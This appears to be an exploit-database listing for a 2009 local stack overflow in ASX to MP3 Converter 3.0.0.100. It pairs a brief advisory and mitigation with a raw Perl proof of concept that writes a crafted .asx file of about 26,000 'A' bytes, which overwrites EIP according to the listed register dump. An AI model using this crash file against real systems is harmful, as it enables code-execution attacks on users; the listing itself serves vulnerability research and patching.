header-logo
Suggest Exploit
vendor:
ASX to MP3 Converter
by:
mat
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: ASX to MP3 Converter
Affected Version From: 3.0.0.100
Affected Version To: 3.0.0.100
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC

A stack overflow vulnerability exists in ASX to MP3 Converter Version 3.0.0.100 when a maliciously crafted .asx file is opened. This can be exploited to execute arbitrary code by overwriting the return address on the stack with a pointer to attacker-supplied code. The vulnerability is caused due to a boundary error when processing the file.

Mitigation:

Upgrade to the latest version of ASX to MP3 Converter.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC
# Exploited By mat
#
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141
###################################################################

my $ex="http://"."\x41" x 26121;
###################################################################
open(MYFILE,'>>mat.asx'); # (.smi) (.smil) (.wpl) (.wax)
print MYFILE $ex;
close(MYFILE);
###################################################################

Navigation

Suggest Exploit

Services By CQR